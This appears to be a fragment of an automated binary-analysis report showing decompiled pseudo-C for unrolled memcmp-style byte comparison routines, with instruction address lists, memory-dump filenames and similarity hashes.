                                                                                      								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                                                                                      								if(_t328 == 0) {
                                                                                      									L52:
                                                                                      									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                                                                                      									if(_t330 == 0) {
                                                                                      										L54:
                                                                                      										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                                                                                      										if(_t332 == 0) {
                                                                                      											L56:
                                                                                      											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                                                                                      											if(_t309 != 0) {
                                                                                      												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                      											}
                                                                                      											goto L59;
                                                                                      										}
                                                                                      										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                      										if(_t309 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L56;
                                                                                      									}
                                                                                      									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                      									if(_t309 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L54;
                                                                                      								}
                                                                                      								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                                                                                      								if(_t309 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L52;
                                                                                      							}
                                                                                      							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                                                                                      							if(_t335 == 0) {
                                                                                      								L41:
                                                                                      								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                                                                                      								if(_t337 == 0) {
                                                                                      									L43:
                                                                                      									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                                                                                      									if(_t339 == 0) {
                                                                                      										L45:
                                                                                      										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                                                                                      										if(_t309 != 0) {
                                                                                      											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                      										}
                                                                                      										goto L48;
                                                                                      									}
                                                                                      									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                      									if(_t309 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L45;
                                                                                      								}
                                                                                      								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                      								if(_t309 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L43;
                                                                                      							}
                                                                                      							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                                                                                      							if(_t309 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L41;
                                                                                      						}
                                                                                      						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                                                                                      						if(_t342 == 0) {
                                                                                      							L30:
                                                                                      							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                                                                                      							if(_t344 == 0) {
                                                                                      								L32:
                                                                                      								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                                                                                      								if(_t346 == 0) {
                                                                                      									L34:
                                                                                      									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                                                                                      									if(_t309 != 0) {
                                                                                      										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                      									}
                                                                                      									goto L37;
                                                                                      								}
                                                                                      								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                      								if(_t309 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L34;
                                                                                      							}
                                                                                      							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                      							if(_t309 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L32;
                                                                                      						}
                                                                                      						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                                                                                      						if(_t309 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L30;
                                                                                      					}
                                                                                      					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                                                                                      					if(_t349 == 0) {
                                                                                      						L19:
                                                                                      						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                                                                                      						if(_t351 == 0) {
                                                                                      							L21:
                                                                                      							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                                                                                      							if(_t353 == 0) {
                                                                                      								L23:
                                                                                      								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                                                                                      								if(_t309 != 0) {
                                                                                      									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                      								}
                                                                                      								goto L26;
                                                                                      							}
                                                                                      							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                      							if(_t309 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L23;
                                                                                      						}
                                                                                      						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                      						if(_t309 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L21;
                                                                                      					}
                                                                                      					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                                                                                      					if(_t309 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L19;
                                                                                      				} else {
                                                                                      					__esi = __dl & 0x000000ff;
                                                                                      					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                      					if(__esi == 0) {
                                                                                      						L8:
                                                                                      						__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                      						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                      						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                      						if(__esi == 0) {
                                                                                      							L10:
                                                                                      							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                      							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                      							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                      							if(__esi == 0) {
                                                                                      								L12:
                                                                                      								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                      								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                      								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                      								if(__esi != 0) {
                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                      								}
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      							__esi = __edx;
                                                                                      							if(__edx != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      						__esi = __edx;
                                                                                      						if(__edx != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      					__esi = __edx;
                                                                                      					if(__edx != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L8;
                                                                                      				}
                                                                                      				L1:
                                                                                      				_t192 = _t309;
                                                                                      				goto L3;
                                                                                      			}
                                                                                      0x00000000
                                                                                      0x0040ea2d
                                                                                      0x0040ea08
                                                                                      0x0040ea0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ea0c
                                                                                      0x0040e96a
                                                                                      0x0040e96c
                                                                                      0x0040e983
                                                                                      0x0040e98b
                                                                                      0x0040e98d
                                                                                      0x0040e9a4
                                                                                      0x0040e9ac
                                                                                      0x0040e9ae
                                                                                      0x0040e9c5
                                                                                      0x0040e9cd
                                                                                      0x0040e9cf
                                                                                      0x0040e9dc
                                                                                      0x0040e9dc
                                                                                      0x00000000
                                                                                      0x0040e9cf
                                                                                      0x0040e9bb
                                                                                      0x0040e9bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e9bf
                                                                                      0x0040e99a
                                                                                      0x0040e99e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e99e
                                                                                      0x0040e979
                                                                                      0x0040e97d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e8d4
                                                                                      0x0040e8d4
                                                                                      0x0040e8d7
                                                                                      0x0040e8db
                                                                                      0x0040e8dd
                                                                                      0x0040e8f4
                                                                                      0x0040e8f4
                                                                                      0x0040e8f8
                                                                                      0x0040e8fc
                                                                                      0x0040e8fe
                                                                                      0x0040e915
                                                                                      0x0040e915
                                                                                      0x0040e919
                                                                                      0x0040e91d
                                                                                      0x0040e91f
                                                                                      0x0040e936
                                                                                      0x0040e936
                                                                                      0x0040e93a
                                                                                      0x0040e93e
                                                                                      0x0040e940
                                                                                      0x0040e946
                                                                                      0x0040e949
                                                                                      0x0040e94d
                                                                                      0x0040e94d
                                                                                      0x00000000
                                                                                      0x0040e940
                                                                                      0x0040e925
                                                                                      0x0040e928
                                                                                      0x0040e92c
                                                                                      0x0040e930
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e930
                                                                                      0x0040e904
                                                                                      0x0040e907
                                                                                      0x0040e90b
                                                                                      0x0040e90f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e90f
                                                                                      0x0040e8e3
                                                                                      0x0040e8e6
                                                                                      0x0040e8ea
                                                                                      0x0040e8ee
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e8ee
                                                                                      0x0040e0e5
                                                                                      0x0040e0e5
                                                                                      0x00000000

Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
• Instruction ID: 14dc86b262c0698d49564d17bd060922aedc175ec51bf9ad3ac027b1749105e3
• Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
• Instruction Fuzzy Hash: 47D18B73D0A9B30AC735852E446822BEA626FD174431ECBF29CD43F3C9963B5D2096D4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                      			E0040E4C0(void* __eax, void* __ecx) {
                                                                                      				void* _t183;
                                                                                      				signed int _t184;
                                                                                      				void* _t187;
                                                                                      				signed char _t193;
                                                                                      				signed char _t194;
                                                                                      				signed char _t195;
                                                                                      				signed char _t196;
                                                                                      				signed char _t198;
                                                                                      				signed int _t296;
                                                                                      				void* _t299;
                                                                                      				void* _t301;
                                                                                      				void* _t303;
                                                                                      				void* _t306;
                                                                                      				void* _t308;
                                                                                      				void* _t310;
                                                                                      				void* _t313;
                                                                                      				void* _t315;
                                                                                      				void* _t317;
                                                                                      				void* _t320;
                                                                                      				void* _t322;
                                                                                      				void* _t324;
                                                                                      				void* _t327;
                                                                                      				void* _t329;
                                                                                      				void* _t331;
                                                                                      				void* _t334;
                                                                                      				void* _t336;
                                                                                      				void* _t338;
                                                                                      
                                                                                      				_t187 = __ecx;
                                                                                      				_t183 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                                                                      					_t296 = 0;
                                                                                      					L12:
                                                                                      					if(_t296 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					_t193 =  *(_t183 - 0x19);
                                                                                      					if(_t193 ==  *(_t187 - 0x19)) {
                                                                                      						_t296 = 0;
                                                                                      						L23:
                                                                                      						if(_t296 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						_t194 =  *(_t183 - 0x15);
                                                                                      						if(_t194 ==  *(_t187 - 0x15)) {
                                                                                      							_t296 = 0;
                                                                                      							L34:
                                                                                      							if(_t296 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							_t195 =  *(_t183 - 0x11);
                                                                                      							if(_t195 ==  *(_t187 - 0x11)) {
                                                                                      								_t296 = 0;
                                                                                      								L45:
                                                                                      								if(_t296 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								_t196 =  *(_t183 - 0xd);
                                                                                      								if(_t196 ==  *(_t187 - 0xd)) {
                                                                                      									_t296 = 0;
                                                                                      									L56:
                                                                                      									if(_t296 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                                                                      										_t296 = 0;
                                                                                      										L67:
                                                                                      										if(_t296 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										_t198 =  *(_t183 - 5);
                                                                                      										if(_t198 ==  *(_t187 - 5)) {
                                                                                      											_t296 = 0;
                                                                                      											L78:
                                                                                      											if(_t296 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                                                                      											if(_t184 != 0) {
                                                                                      												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                                                                                      											}
                                                                                      											L2:
                                                                                      											return _t184;
                                                                                      										}
                                                                                      										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                                                                      										if(_t299 == 0) {
                                                                                      											L71:
                                                                                      											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                                                                      											if(_t301 == 0) {
                                                                                      												L73:
                                                                                      												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                                                                      												if(_t303 == 0) {
                                                                                      													L75:
                                                                                      													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                                                                      													if(_t296 != 0) {
                                                                                      														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                      													}
                                                                                      													goto L78;
                                                                                      												}
                                                                                      												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                                                                                      												if(_t296 != 0) {
                                                                                      													goto L1;
                                                                                      												}
                                                                                      												goto L75;
                                                                                      											}
                                                                                      											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                                                                                      											if(_t296 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											goto L73;
                                                                                      										}
                                                                                      										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                                                                                      										if(_t296 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L71;
                                                                                      									}
                                                                                      									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                                                                      									if(_t306 == 0) {
                                                                                      										L60:
                                                                                      										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                                                                      										if(_t308 == 0) {
                                                                                      											L62:
                                                                                      											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                                                                      											if(_t310 == 0) {
                                                                                      												L64:
                                                                                      												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                                                                      												if(_t296 != 0) {
                                                                                      													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                      												}
                                                                                      												goto L67;
                                                                                      											}
                                                                                      											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                                                                                      											if(_t296 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											goto L64;
                                                                                      										}
                                                                                      										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                                                                                      										if(_t296 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L62;
                                                                                      									}
                                                                                      									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                                                                                      									if(_t296 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L60;
                                                                                      								}
                                                                                      								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                                                                      								if(_t313 == 0) {
                                                                                      									L49:
                                                                                      									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                                                                      									if(_t315 == 0) {
                                                                                      										L51:
                                                                                      										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                                                                      										if(_t317 == 0) {
                                                                                      											L53:
                                                                                      											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                                                                      											if(_t296 != 0) {
                                                                                      												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                      											}
                                                                                      											goto L56;
                                                                                      										}
                                                                                      										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                                                                                      										if(_t296 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L53;
                                                                                      									}
                                                                                      									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                                                                                      									if(_t296 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L51;
                                                                                      								}
                                                                                      								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                                                                                      								if(_t296 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L49;
                                                                                      							}
                                                                                      							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                                                                      							if(_t320 == 0) {
                                                                                      								L38:
                                                                                      								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                                                                      								if(_t322 == 0) {
                                                                                      									L40:
                                                                                      									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                                                                      									if(_t324 == 0) {
                                                                                      										L42:
                                                                                      										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                                                                      										if(_t296 != 0) {
                                                                                      											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                      										}
                                                                                      										goto L45;
                                                                                      									}
                                                                                      									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                                                                                      									if(_t296 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                                                                                      								if(_t296 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L40;
                                                                                      							}
                                                                                      							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                                                                                      							if(_t296 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L38;
                                                                                      						}
                                                                                      						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                                                                      						if(_t327 == 0) {
                                                                                      							L27:
                                                                                      							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                                                                      							if(_t329 == 0) {
                                                                                      								L29:
                                                                                      								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                                                                      								if(_t331 == 0) {
                                                                                      									L31:
                                                                                      									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                                                                      									if(_t296 != 0) {
                                                                                      										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                      									}
                                                                                      									goto L34;
                                                                                      								}
                                                                                      								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                                                                                      								if(_t296 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L31;
                                                                                      							}
                                                                                      							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                                                                                      							if(_t296 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L29;
                                                                                      						}
                                                                                      						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                      						if(_t296 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L27;
                                                                                      					}
                                                                                      					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                                                                      					if(_t334 == 0) {
                                                                                      						L16:
                                                                                      						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                                                                      						if(_t336 == 0) {
                                                                                      							L18:
                                                                                      							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                                                                      							if(_t338 == 0) {
                                                                                      								L20:
                                                                                      								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                                                                      								if(_t296 != 0) {
                                                                                      									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                      								}
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                                                                                      							if(_t296 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                                                                                      						if(_t296 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L18;
                                                                                      					}
                                                                                      					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                      					if(_t296 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L16;
                                                                                      				} else {
                                                                                      					__esi = __dl & 0x000000ff;
                                                                                      					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                      					if(__esi == 0) {
                                                                                      						L5:
                                                                                      						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                      						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                      						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                      						if(__esi == 0) {
                                                                                      							L7:
                                                                                      							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                      							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                      							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                      							if(__esi == 0) {
                                                                                      								L9:
                                                                                      								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                      								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                      								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                      								if(__esi != 0) {
                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                      								}
                                                                                      								goto L12;
                                                                                      							}
                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      							__esi = __edx;
                                                                                      							if(__edx != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L9;
                                                                                      						}
                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      						__esi = __edx;
                                                                                      						if(__edx != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L7;
                                                                                      					}
                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      					__esi = __edx;
                                                                                      					if(__edx != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      				L1:
                                                                                      				_t184 = _t296;
                                                                                      				goto L2;
                                                                                      			}
                                                                                      0x00000000
                                                                                      0x0040e760
                                                                                      0x0040e73b
                                                                                      0x0040e73f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e73f
                                                                                      0x0040e71a
                                                                                      0x0040e71e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e71e
                                                                                      0x0040e67c
                                                                                      0x0040e67e
                                                                                      0x0040e695
                                                                                      0x0040e69d
                                                                                      0x0040e69f
                                                                                      0x0040e6b6
                                                                                      0x0040e6be
                                                                                      0x0040e6c0
                                                                                      0x0040e6d7
                                                                                      0x0040e6df
                                                                                      0x0040e6e1
                                                                                      0x0040e6ee
                                                                                      0x0040e6ee
                                                                                      0x00000000
                                                                                      0x0040e6e1
                                                                                      0x0040e6cd
                                                                                      0x0040e6d1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e6d1
                                                                                      0x0040e6ac
                                                                                      0x0040e6b0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e6b0
                                                                                      0x0040e68b
                                                                                      0x0040e68f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e68f
                                                                                      0x0040e5ed
                                                                                      0x0040e5ef
                                                                                      0x0040e606
                                                                                      0x0040e60e
                                                                                      0x0040e610
                                                                                      0x0040e627
                                                                                      0x0040e62f
                                                                                      0x0040e631
                                                                                      0x0040e648
                                                                                      0x0040e650
                                                                                      0x0040e652
                                                                                      0x0040e65f
                                                                                      0x0040e65f
                                                                                      0x00000000
                                                                                      0x0040e652
                                                                                      0x0040e63e
                                                                                      0x0040e642
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e642
                                                                                      0x0040e61d
                                                                                      0x0040e621
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e621
                                                                                      0x0040e5fc
                                                                                      0x0040e600
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e600
                                                                                      0x0040e55e
                                                                                      0x0040e560
                                                                                      0x0040e577
                                                                                      0x0040e57f
                                                                                      0x0040e581
                                                                                      0x0040e598
                                                                                      0x0040e5a0
                                                                                      0x0040e5a2
                                                                                      0x0040e5b9
                                                                                      0x0040e5c1
                                                                                      0x0040e5c3
                                                                                      0x0040e5d0
                                                                                      0x0040e5d0
                                                                                      0x00000000
                                                                                      0x0040e5c3
                                                                                      0x0040e5af
                                                                                      0x0040e5b3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e5b3
                                                                                      0x0040e58e
                                                                                      0x0040e592
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e592
                                                                                      0x0040e56d
                                                                                      0x0040e571
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e4c8
                                                                                      0x0040e4c8
                                                                                      0x0040e4cb
                                                                                      0x0040e4cf
                                                                                      0x0040e4d1
                                                                                      0x0040e4e8
                                                                                      0x0040e4e8
                                                                                      0x0040e4ec
                                                                                      0x0040e4f0
                                                                                      0x0040e4f2
                                                                                      0x0040e509
                                                                                      0x0040e509
                                                                                      0x0040e50d
                                                                                      0x0040e511
                                                                                      0x0040e513
                                                                                      0x0040e52a
                                                                                      0x0040e52a
